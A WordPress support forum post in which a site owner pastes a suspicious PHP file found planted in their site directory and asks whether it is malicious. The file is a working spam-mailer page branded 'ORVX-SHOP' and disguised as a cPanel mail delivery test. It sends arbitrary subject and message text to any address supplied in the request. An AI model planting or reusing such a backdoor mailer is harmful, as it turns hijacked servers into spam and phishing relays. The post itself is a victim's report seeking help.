I Found Gibberish PHP with strange Code
-
I found gibberish php files with code in my wordpress directory of a fresh website, in maintenance mode with Wordfence Premium:
<?php
error_reporting(0);
$actual_linka = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]";
$partsa = parse_url($actual_linka);
$stra = $partsa['scheme'].'://'.$partsa['host'].$partsa['path'];
$aler = '';
$emall = isset($_REQUEST['email'])?$_REQUEST['email']:null;
function hideEmailAddress($email)
{
$em = explode("@", $email);
$name = implode("@", array_slice($em, 0, count($em) - 1));
$len = floor(strlen($name) / 2);
return substr($name, 0, $len) . str_repeat("*", $len) . "@" . end($em);
}
if (filter_var($emall, FILTER_VALIDATE_EMAIL)){
$recipient = isset ($emall) ? $emall : null;
$subject = isset ($_REQUEST["subject"]) ? $_REQUEST["subject"] : "Delivery Test from cPanel [$stra]";
$message = isset ($_REQUEST["msg"]) ? $_REQUEST["msg"] : "If you see this msg this means that cPanel [$stra] Delivery is working good";
$headers = "MIME-Version: 1.0" . "\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1" . "\r\n";
if(mail($recipient, $subject, $message, $headers))
{
$aler = '<div class="alert alert-success alert-dismissible fade show" role="alert" style="background: rgba(40, 199, 111, 0.2) !important;color: #28C76F !important;border-color: rgb(0 0 0 / 8%);border-radius: 10px;">
<span>Test email sent to '.hideEmailAddress($emall).' Successfully</span>
</div>';
}
else{
$aler = '<div class="alert alert-danger alert-dismissible fade show" role="alert" style="background: rgba(234, 84, 85, 0.2) !important;
color: #EA5455 !important;border-color: rgb(0 0 0 / 8%);border-radius: 10px;">
<span>Test email Failed to '.hideEmailAddress($emall).'</span>
</div>';
}
}
echo '<html lang="en"><head>
<title>' . $_SERVER['HTTP_HOST'] . ' - cPanel delivery test</title>
<link rel="shortcut icon"" >
<link rel="stylesheet" type="text/css" >
<style>
.orvx-auth {
display: -webkit-box;
display: -webkit-flex;
display: -ms-flexbox;
display: flex;
-webkit-flex-basis: 100%;
-ms-flex-preferred-size: 100%;
flex-basis: 100%;
min-height: 100vh;
min-height: calc(var(--vh, 1vh) * 100);
width: 100%
}
.orvx-auth .auth-inner {
width: 100%;
position: relative
}
.orvx-auth.orvx-v1 {
-webkit-box-align: center;
-webkit-align-items: center;
-ms-flex-align: center;
align-items: center;
-webkit-box-pack: center;
-webkit-justify-content: center;
-ms-flex-pack: center;
justify-content: center;
overflow: hidden
}
.orvx-auth.orvx-v1 .auth-inner:before {
width: 244px;
height: 243px;
content:" ";
position: absolute;
top: -54px;
left: -46px;
background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAPQAAADzCAMAAACG9Mt0AAAAAXNSR0IArs4c6QAAAERlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAA6ABAAMAAAABAAEAAKACAAQAAAABAAAA9KADAAQAAAABAAAA8wAAAADhQHfUAAAAyVBMVEUAAAD///+AgP+AgP9mZv+AgNWAgP9tbf9gYP+AgP9xcf9mZv+AZuaAgP9dXf90dOhiYv92dv9mZu5mZv93d+53d/9paf94afCAcfFrXvJra/9mZvJzZvJzc/JoaP96b/Rqav91aupsYvV2bOt2bPVxaPZ7cfZqavZyau1waPd4aO9xafBxafh4afB1bfh4avFuZ/F2afJzZvJzZ/N0aPN0bvN3bPR0ae5yZ/R3be93bfR1au9zafBxbPVzavV0a/F0a/ZyafFwaPKZm3nTAAAAQ3RSTlMAAQIEBQYGBwgICQoKCgsLDQ0PDw8PERESExMUFBQWFxgYGhoaGxsdHSAgIiIiIyQlJygqLCwtLi8vLzAzNDU3Nzg7h9vbHgAAA9RJREFUeNrt3ftS2kAUx/Fc1gSyWsErtuJdRDQiiteolb7/QzUoTm07k4AzObuu3/MCez45yWbzT36eZ6b8erO1e1B97baadd+zocJWmg0HaXe/+uqmg2GWtkLT5Lle1m9LdhG2+1lvzuiUO1knEF81yFc1N+35m15kZOGodz1vyLx+v2Lseq/erxtZd/NuweCTtfiwaWLOD5FnsqI7+VnP3y8afnEs3Es/1+H1qvETwuq18B7e6VlwLup1ZM8kWWQBOsrmHL7GVtxvYRZYgQ4ywae61ffsqH5Lbq20bQm6ncp9P2ehJegwE/u+rl95ttSwLrVSc2ANetAU28dSa9Cp2E623bUG3d2VWmn/wBq0XCugQYMGLdVKoOJaoiuok1NdXSW1WAUfRPtRUllflaJf5ZE/O9pXVbZUPTov5c+IDqvtRwStdTgLutoxy6GnGfYb2o+1I2gd+1OiqzfLocvVE7TSDqG1mgodaqfQZbvZC9rXjqG1X45WzqFVKVpk0LLo4lGP0ZGD6KgMnTiITkrQgXYQrYNitHISrYrRsZPouBhdcxJdK0YnTqKTYrR2Eq1BgwYNGjRo0KBBgwYNGjRo0KBBgwYNGjRo0KBBgwYNGjRo0KBBgwYNGjRo0KBBgwYNGjRo0KBBgwYNGjRo0KBBgwYNGjRo0KBBgwYNGjRoh9DH59ag86ACoSYOL61B55EUQk1s3VqDzsNHhJpYe7QGncfMSHUxaliCHgcKSXVxeWQJehwdJdXF4dAS9DgkTKqLxuibFeiXODixNi7OrEC/BP+JtbE0WrYA/RrxKNfH2YUF6NegSbk+Gk87xtErN6EsWm88fzeMXpwE9EruLns/l42io4dJFLPo2/Po1w+D6IW7t9Bt2SPx3vOOMfS7eHVZtN54ulg2go56138Ct4XRunE2Ovsmjg46WeddUoUWr6WL0fCoIYgO2/2s91fstDZQjcPL0ePt5flpdXUwqW46uMrS1j95JNpQrW0dHp9UV/uT2m416/8HVGg3qzhpBjRo0KBBgwYNGjRo0KBBgwYNGjRo0KBBgwYNGjRo0KBBgwYNGjRo0KBBgwYNGjRo0KBBgwYNGjRo0KBBgwYNGjRo0KBBgwYNGjRo0KBBgwYNGjRo0KC/FDpx0pwUo2tOomvF6NhJdFyMVk6iVTE6cBIdeF9vJyvZx/I/AzuIjsrQvoNovwzt4FamSs0Ojrp80PmvoB0zh940pb7azf1yg7t0LIt978uppzbnalfucDW92ZndLPRmKweGPduYJ+zoM5/Dk+gD5NdvLhXXPp88qcUqmEH5G5JZRs6cuxwIAAAAAElFTkSuQmCC)
}
.orvx-auth.orvx-v1 .auth-inner:after {
width: 272px;
height: 272px;
content:" ";
position: absolute;
bottom: -55px;
right: -75px;
background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAARAAAAEQCAMAAABP1NsnAAAAAXNSR0IArs4c6QAAAERlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAA6ABAAMAAAABAAEAAKACAAQAAAABAAABEKADAAQAAAABAAABEAAAAAAQWxS2AAAAwFBMVEUAAAD///+AgICAgP9VVaqqVf+qqv+AgL+AgP9mZsxmZv+ZZv+AgNWAgP9tbdttbf+Sbf+AYN+AgN+AgP9xceNmZv+AZuaAZv90dOh0dP9qav+AauqAav+AgP92dv9tbf+Abe2Abf93Zu53d+6AcO94afCAcfF5a+R5a/JzZuaAZvKAc/J5bed5bfOAaPN6b/R1auqAavR6ZvV6cPV2bOuAbPV7aPZ2be2AbfZ7au17avZ3Zu53b+57a+97a/d4aO9J6CoeAAAAQHRSTlMAAQICAwMDBAQFBQUGBgcHBwgICAkKCgoLCwwMDAwNDg4ODw8QERITExQUFBUVFhcYGBkZGhobHBwdHR4eHx8gJ5uMWwAAA/FJREFUeNrt2G1XEkEYxvHZNk2xHGzdbKFl0cTwgdSkCKzu7/+t4pw6sAjtjIueE/f8r3fMO35nZnbuy5gVGcvfzJe0rnTfGI+MggGJRUZnbpPIhJKt88nU53JnFULvyISY6KAv8vPj0vr2rYwiE2Z2B9J+uNYcyyQxwWZvaeGH3G4bMjsvI/kcwTC/V+7kLoahlITzQojP3ZFgsJCh7IJQzpX0QFj4uMiY18eDMZ9bZCF9OQahnK6cm/Y7js0sh/LF3Auv1PlQd3MxbdXYIQspV44EEEAAAWTNDAYYkKdJbNMsLzYueZbaZ2iM46RVbHBaiZ9Js+nHEdli42N9XuSen5hGp1CQTuOJQDRsD99N4gMSpYWapNH6IJo83CIeILZQFesEaber79NCWRoukOpNEnW0gXQqD81w6ACxhbrYde7VuFCYeA2QRCNIsgZISyNIqz6IyhPjOjNVIFYniK3dmKU6QdLaJUimEySrDZLrBMlrgxRKU7sxCw/EMe0CAggggADySJCqxixIkKpNEh6IozELD8RxjQACCCCAAPJIkKrGLEgQXqqAAEJjxrQLCCCAAEJjRmNGY8a0CwgggABCYwYIfQgggNCYMe0CAggggNCY0ZjRmDHtAgIIIIAAQmNGHwIIIDRmTLuAAAIIIDRmNGY0Zky7gAACCCCA0JjRhwACCI0Z0y4ggAACCI0ZjRmNGdMuIIAAAgggNGb0IYAAQmPGtAsIIIAAQmNGY0ZjxrQLCCCAAAIIjRl9CCCA0Jgx7QICCCCA0JjRmNGYMe0CAggggABCY0YfAgggNGZMu4AAAgggNGY0ZjRmTLuAAAIIIIDQmNGHAAIIjRnTLiCAAAIIjRmNGY0ZIEy7gAACCCA0ZvQhgABCY8a0CwgggABCY0ZjBgiNGdMuIIAAAgiN2f/Sh+Q6PfLaIJlOkKw2SKoTJK3dmFmdILb2tBvrBIlrg5iWRo+WqQ+SaARJ1gCJAzsxThCN16p1vNurGjNjoo42j07kAHFskoY2kEbl33U0ZgoPjXW+Rl0gkarnahqtDaJKxMPDDWIiNafGenh4gExvVhXfmk7Da6L1AVGxSby2h6MxK79Zk42ea1pJbJ48sU2zDezQ8iy1z6BBwoyjMQsvXp8YQAAhgADilRfyy+wf8WqZZUfGZihvgZiB3FybC+kCUU5XLkAo50C+gbBQdUzkAIVyejIAYfFTI1solHP2HgNCnHn5AYNy4jvpoVB6fVzL91cwzLJ9Lfd7S0jhehxO5H5/yePr1W6gHonI7fJ5ORSR/n6Q2yQanq763zuXU5LJZRKiyD/W9/pjkdPZz0/yJ8fqVyry+qQZDMjJKoDfy8bRVhHhQTwAAAAASUVORK5CYII=);
z-index: -1
}
@media (max-width:575.98px) {
.orvx-auth.orvx-v1 .auth-inner:after,
.orvx-auth.orvx-v1 .auth-inner:before {
display: none
}
}
.orvx-auth.orvx-v1 .auth-inner {
max-width: 500px;
}
.orvx-auth .brand-logo {
display: -webkit-box;
display: -webkit-flex;
display: -ms-flexbox;
display: flex;
-webkit-box-pack: center;
-webkit-justify-content: center;
-ms-flex-pack: center;
justify-content: center;
margin: 1rem 0 2rem
}
.orvx-auth .brand-logo .brand-text {
font-weight: 600
}
@media (min-width:1200px) {
.orvx-auth.auth-v2 .auth-card {
width: 400px
}
}
</style>
</head>
<body style="
color: #B4B7BD;
background-color: #161D31;
">
<div class="orvx-auth orvx-v1 px-2">
<div class="auth-inner py-2">
<div class="card mb-0" style="
background-color: #283046;
box-shadow: 0 4px 24px 0 rgb(34 41 47 / 24%);
border-radius: 10px;
">
<div class="card-body">
<a target="_blank" style="
color: #7367F0 !important;
background-color: transparent;
" class="brand-logo">
<h2 class="brand-text text-primary ml-1" style="
color: #7367F0 !important;
background-color: transparent;
">ORVX-SHOP</h2>
</a>
'.$aler.'
<h4 class="card-title mb-1">Delivery Test</h4>
<p class="card-text mb-2">Tip: you can fast check delivery with this link directly <br><a href="'.$stra.'?email=youremail@domain.com">'. $stra.'?email=youremail@domain.com</a></p>
<form method="post">
<div class="form-group">
<label class="form-label">Email</label>
<input required="" type="email" class="form-control" name="email" placeholder="youremail@domain.com" autofocus="" style="
border-color: #404656;
background-color: #283046;
color: #B4B7BD;
">
<p class="card-text mb-2">Test email will be sent to this email address.</p>
</div>
<button type="submit" class="btn btn-lg float-right" style="border-color: #4839EB !important;background-color: #7367F0 !important;color: #FFFFFF;">Test</button>
</form>
</div>
</div>
</div>
</div>
</body></html>';
exit;Given there is an imgur link to V for Vendeta and has ORVX Shop, this has to be malicious. WF has not picked this up.
Viewing 1 replies (of 1 total)
Viewing 1 replies (of 1 total)
- The topic ‘I Found Gibberish PHP with strange Code’ is closed to new replies.
